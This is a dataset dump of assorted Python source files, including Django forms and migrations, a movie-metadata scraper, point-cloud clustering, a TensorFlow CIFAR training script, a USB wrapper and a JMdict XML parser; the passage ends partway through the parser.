content
stringlengths 5
1.05M
|
---|
from django import forms
from django.contrib.auth.forms import AuthenticationForm
# from django.contrib.auth.models import User
class UserLoginForm(AuthenticationForm):
pass
# def confirm_login_allowed(self, user):
# if not user.is_active or not user.is_validated:
# raise forms.ValidationError(
# 'There was a problem with your login.',
# code='invalid_login'
# )
|
from .dlca import DynamicLCATestCase
from .ia import DynamicIATestCase
from .td import TemporalDistributionTestCase
|
from lxml import etree
import datetime
import json
from wordfilter import censored_words
import javmovie
BASEURL="https://www.r18.com/api/v4f/contents/[id]?lang=en&unit=USD"
SEARCH_URL = "https://www.r18.com/common/search/searchword="
xpath_searchresults = "/html/body/div[6]/div/div[2]/section/ul[2]"
RESULT_LIMIT = 10
def get_by_content_id(content_id):
try:
json_response = JSON.ObjectFromURL(
BASEURL.replace("[id]", content_id),
headers={
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"
}
)
except Exception as e:
return None
if json_response["status"] != "OK":
return None
args = {}
args["content_id"] = content_id
args["jav_code"] = json_response["data"]["dvd_id"]
title = json_response["data"]["title"].lower()
for word, replacement in censored_words.items():
title = title.replace(word.lower(), replacement)
args["title"] = title.title().strip()
tags = []
if json_response["data"]["categories"] is not None:
for tag in json_response["data"]["categories"]:
tagtemp = tag["name"]
to_remove = ["Featured Actress", "Hi-Def", "2021 Winter Sale", "Sale (limited time)", "Digital Mosaic", "AV OPEN 2017 Y********l Category"]
if tagtemp in to_remove:
continue
for word, replacement in censored_words.items():
tagtemp = tagtemp.lower().replace(word.lower(), replacement)
tags.append(tagtemp.title())
args["tags"] = tags
if json_response["data"]["maker"] is not None and json_response["data"]["maker"]["name"] is not None:
args["studio_label"] = json_response["data"]["maker"]["name"]
else:
args["studio_label"] = None
date = json_response["data"]["release_date"]
if date is None:
args["release_date"] = None
else:
args["release_date"] = datetime.datetime.strptime(date, "%Y-%m-%d %H:%M:%S")
args["image_url"] = json_response["data"]["images"]["jacket_image"]["large"]
return javmovie.JAVMovie(args)
def __str__(self):
print("<R18Movie " + self.jav_code + ">")
def get_search_results(keyword):
try:
html = HTTP.Request(SEARCH_URL + keyword + "/").content
except Exception as e:
raise e
tree = etree.HTML(html)
result_elements = tree.xpath(xpath_searchresults)
if len(result_elements) == 0:
return []
result_urls = result_elements[0]
if len(result_urls) == 0:
return []
results_checked = 0
results = []
for result in result_urls:
mov_result = get_by_content_id(result[0].attrib["href"].split("id=")[1].replace("/", ""))
results.append(mov_result)
results_checked += 1
if results_checked >= RESULT_LIMIT:
break
return results
|
import numpy as np
import pandas as pd
from collections import Counter
from statistics import mode, StatisticsError
import warnings
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.cluster import DBSCAN
import hdbscan
def centroid_3d(arr):
"""Calculate the centroid of a set of points"""
length = arr.shape[0]
sum_x = np.sum(arr[:, 0])
sum_y = np.sum(arr[:, 1])
sum_z = np.sum(arr[:, 2])
return sum_x / length, sum_y / length, sum_z / length
def show_images_and_points(
images, points, cluster_classes, class_names=None, titles=None, figsize=(12, 4)
):
n_ims = len(images)
if titles is None:
titles = ["(%d)" % i for i in range(1, n_ims + 1)]
fig = plt.figure(figsize=figsize)
n = 1
plt.style.use("ggplot")
if class_names is None:
class_names = [str(i) for i in cluster_classes]
for image, title in zip(images, titles):
a = fig.add_subplot(1, n_ims, n)
plt.imshow(image, cmap="gray")
scat = a.scatter(
points[:, 1], points[:, 2], c=cluster_classes, cmap="jet_r", s=50, alpha=1.0
)
a.legend(handles=scat.legend_elements()[0], labels=class_names)
a.set_title(title)
n += 1
def rescale_3d(X, x_scale, y_scale, z_scale):
"""Scale an array of points by given x,y and z scale"""
X_rescaled = np.zeros_like(X)
X_rescaled[:, 0] = X[:, 0] * x_scale
X_rescaled[:, 1] = X[:, 1] * y_scale
X_rescaled[:, 2] = X[:, 2] * z_scale
return X_rescaled
def aggregation(
orig_pts,
chip,
offset_x,
offset_y,
min_cluster_size=5,
min_samples=1,
eps=5,
method="hdbscan",
plot_all=False,
debug_verbose=False,
quantile_threshold=0.95,
):
"""Cluster and simplify point cloud data.
Args:
orig_pts (np.ndarray): array of 3d points
chip (np.ndarray): chip volume
offset_x (int): x offset in original volume
offset_y (int): y offset in original volume
min_cluster_size (int, optional): minimum number of points in a cluster. Defaults to 5.
method (str, optional): cluster method. Defaults to 'hdbscan'.
plot_all (bool, optional): debug plotting. Defaults to False.
debug_verbose (bool, optional): debug messages. Defaults to False.
Returns:
np.ndarray, np.ndarray: cluster centroids, cluster classes
"""
X = orig_pts.copy()
img_sample = chip[chip.shape[0] // 2, :]
subsample = False
print(f"Image {chip.shape}")
print(f"Clustering pts {orig_pts.shape}")
if plot_all:
plt.figure(figsize=(14, 14))
plt.gca().invert_yaxis()
plt.scatter(
orig_pts[:, 1] - offset_x,
orig_pts[:, 2] - offset_y,
s=5,
linewidth=0,
c=orig_pts[:, 3],
alpha=1.0,
)
plt.title("Raw Points Before")
if subsample:
X = np.array(X)
samp_prop = 0.3
num_samp = int(samp_prop * len(X))
X = np.floor(np.random.permutation(X))[0:num_samp, :]
scale_minmax = False
if scale_minmax:
scale_x = 1.0 / np.max(X[:, 0])
scale_y = 1.0 / np.max(X[:, 1])
scale_z = 1.0 / np.max(X[:, 2])
if debug_verbose:
print("Scaling by {} {} {}".format(scale_x, scale_y, scale_z))
# X_rescaled = rescale_3d(orig_pts, scale_x, scale_y, scale_z)
x_scale = xend - xstart
y_scale = yend - ystart
slicestart = 0
sliceend = vol_shape_z
z_scale = (sliceend - slicestart) * 5 # HACK (not sure how best to scale z)
X_rescaled = rescale_3d(X, scale_x, scale_y, scale_z)
else:
X_rescaled = X.copy()
if scale_minmax:
xlim = (
np.min(X_rescaled[:, 1]).astype(np.uint16) - 0.1,
np.max(X_rescaled[:, 1]).astype(np.uint16) + 0.1,
)
ylim = (
np.min(X_rescaled[:, 2]).astype(np.uint16) - 0.1,
np.max(X_rescaled[:, 2]).astype(np.uint16) + 0.1,
)
zlim = (
np.min(X_rescaled[:, 0]).astype(np.uint16) - 0.1,
np.max(X_rescaled[:, 0]).astype(np.uint16) + 0.1,
)
else:
xlim = (0, chip.shape[1])
ylim = (0, chip.shape[2])
zlim = (0, chip.shape[0])
#
# Point cloud cluster
#
if method == "hdbscan":
clusterer = hdbscan.HDBSCAN(
min_cluster_size=min_cluster_size, min_samples=1
).fit(X_rescaled)
label_code = clusterer.labels_
num_clusters_found = len(np.unique(label_code))
threshold = pd.Series(clusterer.outlier_scores_).quantile(quantile_threshold)
outliers = np.where(clusterer.outlier_scores_ > threshold)[0]
X_rescaled_cl = np.delete(X_rescaled, outliers, axis=0)
label_code_cl = np.delete(label_code, outliers, axis=0)
cluster_probs_cl = np.delete(clusterer.probabilities_, outliers, axis=0)
num_outliers_removed = X_rescaled.shape[0] - X_rescaled_cl.shape[0]
if debug_verbose:
print("Limits: {} {} {} ".format(xlim, ylim, zlim))
print(np.min(X[:, 0]), np.min(X[:, 1]), np.min(X[:, 2]))
print(
"Orig: {} Clean: {} Num points rem: {}".format(
X_rescaled.shape[0], X_rescaled_cl.shape[0], num_outliers_removed
)
)
print(
"Proportion removed: {}".format(
num_outliers_removed / X_rescaled.shape[0]
)
)
elif method == "dbscan":
clusterer = DBSCAN(eps=eps, min_samples=min_samples).fit(X_rescaled)
label_code_cl = clusterer.labels_
X_rescaled_cl = X_rescaled[label_code_cl != -1]
num_clusters_found = len(np.unique(label_code_cl))
cluster_coords = []
cluster_sizes = []
for l in np.unique(label_code_cl)[0:]:
cluster_coords.append(X_rescaled_cl[label_code_cl == l])
cluster_coords = np.array(cluster_coords)
cluster_sizes = np.array([len(cluster_coord) for cluster_coord in cluster_coords])
print(f"Cluster sizes {cluster_sizes.shape}")
cluster_centroids = np.array(
[centroid_3d(cluster_coord) for cluster_coord in cluster_coords]
)
cluster_centroids = np.array(cluster_centroids)
cluster_sizes = np.array(cluster_sizes)
title_str = "Number of original clicks: {0} Number of final centroids: {1} Av clicks cluster {2}".format(
X_rescaled.shape[0],
cluster_sizes.shape[0],
X_rescaled.shape[0] / cluster_sizes.shape[0],
)
slice_center = int(chip.shape[0] / 2.0)
cc2 = np.roll(cluster_centroids, shift=2, axis=1)
slice_top, slice_bottom = slice_center + 5, slice_center - 5
centroid_coords_woffset = cc2.copy()
centroid_coords_woffset[:, 1] = centroid_coords_woffset[:, 1] - offset_y
centroid_coords_woffset[:, 0] = centroid_coords_woffset[:, 0] - offset_x
cc = []
for c in cluster_coords:
cluster_classes = list(c[:, 3].astype(np.uint32))
try:
classes_mode = mode(cluster_classes)
except StatisticsError as e:
classes_mode = np.random.choice(cluster_classes)
cc.append(classes_mode)
# print(f"Assigned class for cluster: {classes_mode}")
if debug_verbose:
print(f"Number of clusters: {len(cluster_coords)}")
# print(f"Cluster classes {cc}")
print(f"Len cluster classes {len(cc)}")
clustered = np.zeros((cluster_centroids.shape[0], 4))
clustered[:, 0:3] = cluster_centroids
clustered[:, 3] = cc
if plot_all:
plt.figure(figsize=(14, 14))
plt.gca().invert_yaxis()
plt.scatter(
centroid_coords_woffset[:, 0] - offset_x,
centroid_coords_woffset[:, 1] - offset_y,
s=5,
linewidth=0,
c=cc,
alpha=1.0,
)
plt.title("Raw Points After")
show_images_and_points(
[
img_sample,
],
cluster_centroids,
cc,
figsize=(12, 12),
)
print(f"Produced clustered output of shape: {clustered.shape}")
return clustered
|
import numpy as np
import argparse
import os, sys, datetime
import tensorflow as tf
from tensorpack import *
from tensorpack.tfutils.symbolic_functions import *
from tensorpack.tfutils.summary import *
from tensorpack.utils import anytime_loss, logger, utils, fs
from tensorpack.callbacks import Exp3CPU, RWMCPU, FixedDistributionCPU, ThompsonSamplingCPU
from tensorflow.contrib.layers import variance_scaling_initializer
"""
"""
MODEL_DIR=None
# Whether use validation set:
DO_VALID=False
# Network structure
BATCH_SIZE = 128
NUM_RES_BLOCKS = 3
NUM_UNITS = 5
WIDTH = 1
INIT_CHANNEL = 16
NUM_CLASSES=10
# anytime loss skip (num units per stack/prediction)
NUM_UNITS_PER_STACK=1
# Random loss sample params
##0: nothing; 1: rand; 2:exp3; 3:HEHE3
SAMLOSS=0
EXP3_GAMMA=0.5
SUM_RAND_RATIO=2.0
LAST_REWARD_RATE=0.85
# Stop gradients params
STOP_GRADIENTS=False
STOP_GRADIENTS_PARTIAL=False
SG_GAMMA = 0.3
TRACK_GRADIENTS=False
# For other loss weight assignments
FUNC_TYPE=5
OPTIMAL_AT=-1
EXP_BASE=2.0
def loss_weights(N):
if FUNC_TYPE == 0: # exponential spacing
return anytime_loss.at_func(N, func=lambda x:2**x)
elif FUNC_TYPE == 1: # square spacing
return anytime_loss.at_func(N, func=lambda x:x**2)
elif FUNC_TYPE == 2: #optimal at ?
return anytime_loss.optimal_at(N, OPTIMAL_AT)
elif FUNC_TYPE == 3: #exponential weights
return anytime_loss.exponential_weights(N, base=EXP_BASE)
elif FUNC_TYPE == 4: #constant weights
return anytime_loss.constant_weights(N)
elif FUNC_TYPE == 5: # sieve with stack
return anytime_loss.stack_loss_weights(N, NUM_UNITS_PER_STACK)
elif FUNC_TYPE == 6: # linear
return anytime_loss.linear(N, a=0.25, b=1.0)
elif FUNC_TYPE == 7: # half constant, half optimal at -1
return anytime_loss.half_constant_half_optimal(N, -1)
elif FUNC_TYPE == 8: # quater constant, half optimal
return anytime_loss.quater_constant_half_optimal(N)
elif FUNC_TYPE == 9:
return anytime_loss.stack_loss_weights(N, NUM_UNITS_PER_STACK, anytime_loss.eann_sieve)
else:
raise NameError('func type must be either 0: exponential or 1: square\
or 2: optimal at --opt_at, or 3: exponential weight with base --base')
class Model(ModelDesc):
def __init__(self, n, width, init_channel, num_classes, weights):
super(Model, self).__init__()
self.n = n
self.width = width
self.init_channel = init_channel
self.num_classes = num_classes
self.weights = weights
def _get_inputs(self):
return [InputDesc(tf.float32, [None, 32, 32, 3], 'input'),
InputDesc(tf.int32, [None], 'label')]
def _build_graph(self, inputs):
image, label = inputs
image = image / 128.0
image = tf.transpose(image, [0,3,1,2])
def conv(name, l, channel, stride):
kernel = 3
stddev = np.sqrt(2.0/kernel/kernel/channel)
return Conv2D(name, l, channel, kernel, stride=stride,
nl=tf.identity, use_bias=False,
W_init=variance_scaling_initializer(mode='FAN_OUT'))
def residual(name, l_feats, increase_dim=False):
shape = l_feats[0].get_shape().as_list()
in_channel = shape[1]
if increase_dim:
out_channel = in_channel * 2
stride1 = 2
else:
out_channel = in_channel
stride1 = 1
l_mid_feats = []
for w in range(self.width):
with tf.variable_scope(name+'.'+str(w)+'.mid') as scope:
l = BatchNorm('bn0', l_feats[w])
# The first round doesn't use relu per pyramidial deep net
# l = tf.nn.relu(l)
if w == 0:
merged_feats = l
else:
merged_feats = tf.concat([merged_feats, l], 1, name='concat_mf')
l = conv('conv1', merged_feats, out_channel, stride1)
l = BatchNorm('bn1', l)
l = tf.nn.relu(l)
l_mid_feats.append(l)
l_end_feats = []
for w in range(self.width):
with tf.variable_scope(name+'.'+str(w)+'.end') as scope:
l = l_mid_feats[w]
if w == 0:
merged_feats = l
else:
merged_feats = tf.concat([merged_feats, l], 1, name='concat_ef')
ef = conv('conv2', merged_feats, out_channel, 1)
# The second conv need to be BN before addition.
ef = BatchNorm('bn2', ef)
l = l_feats[w]
if increase_dim:
l = AvgPooling('pool', l, 2)
l = tf.pad(l, [[0,0], [in_channel//2, in_channel//2], [0,0], [0,0]])
ef += l
l_end_feats.append(ef)
return l_end_feats
def row_sum_predict(name, l_feats, out_dim):
l_logits = []
var_list = []
for w in range(self.width):
with tf.variable_scope(name+'.'+str(w)+'.predict') as scope:
l = tf.nn.relu(l_feats[w])
l = GlobalAvgPooling('gap', l)
if w == 0:
merged_feats = l
else:
merged_feats = tf.concat([merged_feats, l], 1, name='concat')
logits = FullyConnected('linear', merged_feats, out_dim, \
nl=tf.identity)
var_list.append(logits.variables.W)
var_list.append(logits.variables.b)
#if w != 0:
# logits += l_logits[-1]
l_logits.append(logits)
return l_logits, var_list
def cost_and_eval(name, l_logits, label):
l_costs = []
l_wrong = []
for w in range(self.width):
with tf.variable_scope(name+'.'+str(w)+'.eval') as scope:
logits = l_logits[w]
cost = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=label)
cost = tf.reduce_mean(cost, name='cross_entropy_loss')
add_moving_summary(cost)
wrong = prediction_incorrect(logits, label)
wrong = tf.reduce_mean(wrong, name='train_error')
add_moving_summary(wrong)
l_costs.append(cost)
l_wrong.append(wrong)
return l_costs, l_wrong
logger.info("sampling loss with method {}".format(SAMLOSS))
if SAMLOSS > 0:
ls_K = np.sum(np.asarray(self.weights) > 0)
select_idx = tf.get_variable("select_idx", (), tf.int32,
initializer=tf.constant_initializer(ls_K - 1), trainable=False)
for i in range(ls_K):
weight_i = tf.cast(tf.equal(select_idx, i), tf.float32, name='weight_{}'.format(i))
add_moving_summary(weight_i)
with argscope([Conv2D, AvgPooling, BatchNorm, GlobalAvgPooling], data_format='NCHW'):
l_feats = []
for w in range(self.width):
with tf.variable_scope('init_conv'+str(w)) as scope:
l = conv('conv0', image, self.init_channel, 1)
#l = BatchNorm('bn0', l)
#l = tf.nn.relu(l)
l_feats.append(l)
wd_w = tf.train.exponential_decay(0.0002, get_global_step_var(),
480000, 0.2, True)
wd_cost = 0
cost = 0
unit_idx = -1
anytime_idx = -1
online_learn_rewards = []
last_cost = None
max_reward = 0.0
for res_block_i in range(NUM_RES_BLOCKS):
for k in range(self.n):
scope_name = 'res{}.{:02d}'.format(res_block_i, k)
l_feats = \
residual(scope_name, l_feats,
increase_dim=(k==0 and res_block_i > 0))
l_logits, var_list = row_sum_predict(scope_name, l_feats, self.num_classes)
l_costs, l_wrong = cost_and_eval(scope_name, l_logits, label)
is_last_row = res_block_i == NUM_RES_BLOCKS-1 and k==self.n-1
for ci, c in enumerate(l_costs):
unit_idx += 1
cost_weight = self.weights[unit_idx]
if cost_weight > 0:
anytime_idx += 1
add_weight = 0
if SAMLOSS > 0:
add_weight = tf.cond(tf.equal(anytime_idx, select_idx),
lambda: tf.constant(self.weights[-1] * 2.0, dtype=tf.float32),
lambda: tf.constant(0, dtype=tf.float32))
if SUM_RAND_RATIO > 0:
cost += (cost_weight + add_weight / SUM_RAND_RATIO) * c
else:
cost += add_weight * c
# Regularize weights from FC layers. Should use
# regularize_cost to get the weights using variable names
wd_cost += cost_weight * wd_w * tf.nn.l2_loss(var_list[2*ci])
#gs = tf.gradients(c, tf.trainable_variables())
#reward = tf.add_n([tf.nn.l2_loss(g) for g in gs if g is not None])
if not last_cost is None:
reward = 1.0 - c / last_cost
max_reward = tf.maximum(reward, max_reward)
online_learn_rewards.append(tf.multiply(reward, 1.0,
name='reward_{:02d}'.format(anytime_idx-1)))
if ci == len(l_costs)-1 and is_last_row:
reward = max_reward * LAST_REWARD_RATE
online_learn_rewards.append(tf.multiply(reward, 1.0,
name='reward_{:02d}'.format(anytime_idx)))
#cost = tf.Print(cost, online_learn_rewards)
last_cost = c
if STOP_GRADIENTS_PARTIAL and not is_last_row:
l = l_feats[ci]
l = (1 - SG_GAMMA) * tf.stop_gradient(l) + SG_GAMMA * l
l_feats[ci] = l
#endif cost_weight > 0
#endfor each width
#endfor each n
# endfor each block
# weight decay on all W on conv layers
wd_cost = tf.add(wd_cost, wd_w * regularize_cost('.*conv.*/W', tf.nn.l2_loss), \
name='wd_cost')
add_moving_summary(cost, wd_cost)
add_param_summary(('.*/W', ['histogram'])) # monitor W
self.cost = tf.add_n([cost, wd_cost], name='cost')
def _get_optimizer(self):
lr = get_scalar_var('learning_rate', 0.01, summary=True)
opt = tf.train.MomentumOptimizer(lr, 0.9)
return opt
def get_data(train_or_test):
isTrain = train_or_test == 'train'
if NUM_CLASSES == 10:
ds = dataset.Cifar10(train_or_test, do_validation=DO_VALID)
elif NUM_CLASSES == 100:
ds = dataset.Cifar100(train_or_test, do_validation=DO_VALID)
else:
raise ValueError('Number of classes must be set to 10(default) or 100 for CIFAR')
if DO_VALID:
print '{} {}'.format(isTrain, len(ds.data))
pp_mean = ds.get_per_pixel_mean()
if isTrain:
augmentors = [
imgaug.CenterPaste((40, 40)),
imgaug.RandomCrop((32, 32)),
imgaug.Flip(horiz=True),
imgaug.MapImage(lambda x: x - pp_mean),
]
else:
augmentors = [
imgaug.MapImage(lambda x: x - pp_mean)
]
ds = AugmentImageComponent(ds, augmentors)
ds = BatchData(ds, BATCH_SIZE, remainder=not isTrain)
if isTrain:
ds = PrefetchData(ds, 3, 2)
return ds
def get_config():
# prepare dataset
dataset_train = get_data('train')
steps_per_epoch = dataset_train.size()
dataset_test = get_data('test')
vcs = []
total_units = NUM_RES_BLOCKS * NUM_UNITS * WIDTH
weights = loss_weights(total_units)
unit_idx = -1
for bi in range(NUM_RES_BLOCKS):
for ui in range(NUM_UNITS):
for wi in range(WIDTH):
unit_idx += 1
weight = weights[unit_idx]
if weight > 0:
scope_name = 'res{}.{:02d}.{}.eval/'.format(bi, ui, wi)
vcs.append(ClassificationError(\
wrong_tensor_name=scope_name+'incorrect_vector:0',
summary_name=scope_name+'val_err'))
if SAMLOSS > 0:
ls_K = np.sum(np.asarray(weights) > 0)
reward_names = [ 'tower0/reward_{:02d}:0'.format(i) for i in range(ls_K)]
if SAMLOSS == 3:
online_learn_cb = FixedDistributionCPU(ls_K, 'select_idx:0', None)
elif SAMLOSS == 6:
online_learn_cb = FixedDistributionCPU(ls_K, 'select_idx:0',
weights[weights>0])
else:
gamma = EXP3_GAMMA
if SAMLOSS == 1:
online_learn_func = Exp3CPU
gamma = 1.0
elif SAMLOSS == 2:
online_learn_func = Exp3CPU
elif SAMLOSS == 4:
online_learn_func = RWMCPU
elif SAMLOSS == 5:
online_learn_func = ThompsonSamplingCPU
online_learn_cb = online_learn_func(ls_K, gamma,
'select_idx:0', reward_names)
online_learn_cb = [ online_learn_cb ]
else:
online_learn_cb = []
logger.info('weights: {}'.format(weights))
#if SAMLOSS > 0:
# lr_schedule = [(1, 0.1), (82, 0.02), (123, 0.004), (250, 0.0008)]
#else:
lr_schedule = [(1, 0.1), (82, 0.01), (123, 0.001), (250, 0.0002)]
return TrainConfig(
dataflow=dataset_train,
callbacks=[
ModelSaver(checkpoint_dir=MODEL_DIR),
InferenceRunner(dataset_test,
[ScalarStats('cost')] + vcs),
ScheduledHyperParamSetter('learning_rate', lr_schedule)
] + online_learn_cb,
model=Model(NUM_UNITS,WIDTH,INIT_CHANNEL,NUM_CLASSES,weights),
steps_per_epoch=steps_per_epoch,
max_epoch=300,
)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--log_dir', help='log_dir position',
type=str, default=None)
parser.add_argument('--data_dir', help='data_dir position',
type=str, default=None)
parser.add_argument('--model_dir', help='model_dir position',
type=str, default=None)
parser.add_argument('--batch_size', help='Batch size for train/testing',
type=int, default=BATCH_SIZE)
parser.add_argument('-n', '--num_units',
help='number of units in each stage',
type=int, default=NUM_UNITS)
parser.add_argument('-w', '--width',
help='width of the network',
type=int, default=WIDTH)
parser.add_argument('-c', '--init_channel',
help='channel at beginning of each width of the network',
type=int, default=INIT_CHANNEL)
parser.add_argument('-s', '--stack',
help='number of units per stack, \
i.e., number of units per prediction',
type=int, default=NUM_UNITS_PER_STACK)
parser.add_argument('--num_classes', help='Number of classes',
type=int, default=NUM_CLASSES)
parser.add_argument('--stopgrad', help='Whether to stop gradients.',
type=bool, default=STOP_GRADIENTS)
parser.add_argument('--stopgradpartial', help='Whether to stop gradients for other width.',
type=bool, default=STOP_GRADIENTS_PARTIAL)
parser.add_argument('--sg_gamma', help='Gamma for partial stop_gradient',
type=np.float32, default=SG_GAMMA)
parser.add_argument('--samloss', help='Method to Sample losses to update',
type=int, default=SAMLOSS)
parser.add_argument('--exp_gamma', help='Gamma for exp3 in sample loss',
type=np.float32, default=EXP3_GAMMA)
parser.add_argument('--sum_rand_ratio', help='frac{Sum weight}{randomly selected weight}',
type=np.float32, default=SUM_RAND_RATIO)
parser.add_argument('--last_reward_rate', help='rate of last reward in comparison to the max',
type=np.float32, default=LAST_REWARD_RATE)
parser.add_argument('--track_grads', help='Whether to track gradient l2 of each loss',
type=bool, default=TRACK_GRADIENTS)
parser.add_argument('--do_validation', help='Whether use validation set. Default not',
type=bool, default=DO_VALID)
parser.add_argument('-f', '--func_type',
help='Type of non-linear spacing to use: 0 for exp, 1 for sqr',
type=int, default=FUNC_TYPE)
parser.add_argument('--base', help='Exponential base',
type=np.float32, default=EXP_BASE)
parser.add_argument('--opt_at', help='Optimal at',
type=int, default=OPTIMAL_AT)
parser.add_argument('--gpu', help='comma separated list of GPU(s) to use.')
parser.add_argument('--load', help='load model')
args = parser.parse_args()
FUNC_TYPE = args.func_type
BATCH_SIZE = args.batch_size
NUM_UNITS = args.num_units
WIDTH = args.width
INIT_CHANNEL = args.init_channel
NUM_UNITS_PER_STACK = args.stack
NUM_CLASSES = args.num_classes
STOP_GRADIENTS = args.stopgrad
STOP_GRADIENTS_PARTIAL = args.stopgradpartial
SG_GAMMA = args.sg_gamma
SAMLOSS = args.samloss
EXP3_GAMMA = args.exp_gamma
SUM_RAND_RATIO = args.sum_rand_ratio
LAST_REWARD_RATE = args.last_reward_rate
TRACK_GRADIENTS = args.track_grads
DO_VALID = args.do_validation
EXP_BASE = args.base
OPTIMAL_AT = args.opt_at
print("TF version: {}".format(tf.__version__))
if STOP_GRADIENTS:
STOP_GRADIENTS_PARTIAL = True
SG_GAMMA = 0.0
if args.gpu:
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
logger.set_log_root(log_root=args.log_dir)
logger.auto_set_dir()
fs.set_dataset_path(path=args.data_dir, auto_download=False)
MODEL_DIR = args.model_dir
logger.info("On Dataset CIFAR{}, Parameters: f= {}, n= {}, w= {}, c= {}, s= {}, batch_size= {}, stopgrad= {}, stopgradpartial= {}, sg_gamma= {}, rand_loss_selector= {}, exp_gamma= {}, sum_rand_ratio= {} do_validation= {} exp_base= {} opt_at= {}".format(\
NUM_CLASSES, FUNC_TYPE, NUM_UNITS, WIDTH, INIT_CHANNEL, \
NUM_UNITS_PER_STACK, BATCH_SIZE, STOP_GRADIENTS, \
STOP_GRADIENTS_PARTIAL, SG_GAMMA, \
args.samloss, EXP3_GAMMA, SUM_RAND_RATIO, DO_VALID, \
EXP_BASE, OPTIMAL_AT))
config = get_config()
if args.load:
config.session_init = SaverRestore(args.load)
if args.gpu:
config.nr_tower = len(args.gpu.split(','))
SyncMultiGPUTrainer(config).train()
|
# -*- coding: utf-8 -*-
import usb.core
class USBDevice(object):
def __init__(self, device):
self.device = device
self.device.default_timeout = 1000
self.device.set_configuration()
def __del__(self):
usb.util.dispose_resources(self.device)
|
from os.path import join
import os
from loan import constants
import subprocess
def csv_log_process(form_name, manage_command_name):
"""
This function is executing the process of adding the uploaded csv data to
the database and logging the errors (if any) in log files.
"""
task = form_name.save(commit=False)
task.status = constants.TASK_STATUS_YET_TO_START
task.save()
log_dir = join(os.getcwd(), "csvlogs")
if not os.path.exists(log_dir):
os.mkdir(log_dir)
log_file = open(join(log_dir, "csv.log"), "a+")
error_log_file = open(join(log_dir, "csverror.log"), "a+")
manage_py_location = join(os.getcwd(), "manage.py")
python_path = join(os.getcwd(), ".heroku", "python", "bin", "python")
command_run_args = [
python_path,
manage_py_location,
manage_command_name,
]
args = [
str(task.id),
]
subprocess.Popen(
command_run_args + args,
env=os.environ.copy(),
stdout=log_file,
stderr=error_log_file,
)
return task.id
|
# Generated by Django 3.1.2 on 2020-10-17 10:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Product', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('categoryid', models.CharField(max_length=200, unique=True)),
('category_name', models.CharField(max_length=50, unique=True)),
('date_posted', models.DateField()),
],
),
migrations.RemoveField(
model_name='product',
name='categories',
),
migrations.AddField(
model_name='product',
name='id',
field=models.AutoField(auto_created=True, default=1, primary_key=True, serialize=False, verbose_name='ID'),
preserve_default=False,
),
migrations.AlterField(
model_name='product',
name='productid',
field=models.CharField(max_length=200, unique=True),
),
migrations.AddField(
model_name='product',
name='category',
field=models.ManyToManyField(to='Product.Category'),
),
]
|
# Generated by Django 2.2.3 on 2019-07-19 12:33
import django.contrib.postgres.fields.jsonb
from django.db import migrations
import polygon.core.utils.json_serializer
class Migration(migrations.Migration):
dependencies = [("product", "0097_auto_20190719_0458")]
operations = [
migrations.AlterField(
model_name="product",
name="meta",
field=django.contrib.postgres.fields.jsonb.JSONField(
blank=True,
default=dict,
encoder=polygon.core.utils.json_serializer.CustomJsonEncoder,
null=True,
),
),
migrations.AlterField(
model_name="producttype",
name="meta",
field=django.contrib.postgres.fields.jsonb.JSONField(
blank=True,
default=dict,
encoder=polygon.core.utils.json_serializer.CustomJsonEncoder,
null=True,
),
),
]
|
from typing import BinaryIO, Dict, Generator, List, Tuple, Union
from lxml import etree # type: ignore
from botto.core.models.jmdict import (
Entry,
WritingElement,
ReadingElement,
Sense,
Gloss,
LSource,
ReadingWriting,
ReadingSense,
WritingSense,
)
XMLNS: str = "{http://www.w3.org/XML/1998/namespace}"
def _get_child(node: etree._Element, tag: str) -> etree._Element:
return next(node.iter(tag))
def _has_child(node: etree._Element, tag: str) -> bool:
try:
_get_child(node, tag)
except StopIteration:
return False
return True
def _parse_node(entry_node: etree._Element) -> Tuple[Entry, dict]:
entry_id: int = int(_get_child(entry_node, "ent_seq").text)
# ALl model instances
entry: Entry = Entry(id=entry_id)
writing_elements: List[WritingElement] = []
reading_elements: List[ReadingElement] = []
reading_writings_mapping: Dict[ReadingElement, List[WritingElement]] = {}
readings_writings: List[ReadingWriting] = []
senses: List[Sense] = []
lsources: List[LSource] = []
glosses: List[Gloss] = []
writings_senses: List[WritingSense] = []
readings_senses: List[ReadingSense] = []
# Creating WritingElement instances from <entry><k_ele> tags.
for k_ele in entry_node.iter("k_ele"):
writing_elements.append(
WritingElement(
entry_id=entry_id,
literal=_get_child(k_ele, "keb").text,
priority=[ke_pri.text for ke_pri in k_ele.iter("ke_pri")],
info=[ke_inf.text for ke_inf in k_ele.iter("ke_inf")],
)
)
# Creating ReadingElement instances from <entry><r_ele> tags.
# Also, registering relationships between ReadingElement instances and
# WritingElement literals from <entry><r_ele><re_restr> tags or <re_nokanji/>.
for r_ele in entry_node.iter("r_ele"):
reading_elem = ReadingElement(
entry_id=entry_id,
literal=_get_child(r_ele, "reb").text,
priority=[re_pri.text for re_pri in r_ele.iter("re_pri")],
info=[re_inf.text for re_inf in r_ele.iter("re_inf")],
)
if _has_child(r_ele, "re_nokanji"):
# This reading does not match any of the writing elemnts.
reading_writings_mapping[reading_elem] = []
elif _has_child(r_ele, "re_restr"):
# This reading is restricted to some writing elements only.
reading_writings_mapping[reading_elem] = [
re_restr.text for re_restr in r_ele.iter("re_restr")
]
else:
# This reading matches all writing elements.
reading_writings_mapping[reading_elem] = [
w.literal for w in writing_elements
]
reading_elements.extend(reading_writings_mapping)
# Creating ReadingWriting relational instances.
for reading_elem, writing_literals in reading_writings_mapping.items():
reading_writing = [
ReadingWriting(
entry_id=entry_id,
reading_literal=reading_elem.literal,
writing_literal=w,
)
for w in writing_literals
]
readings_writings.extend(reading_writing)
last_parts_of_speech = None
last_misc = None
# Creating Sense-related instances from <entry><sense> tags.
for sense_index, sense_node in enumerate(entry_node.iter("sense"), 1):
new_parts_of_speech = [pos.text for pos in sense_node.iter("pos")]
new_misc = [m.text for m in sense_node.iter("misc")]
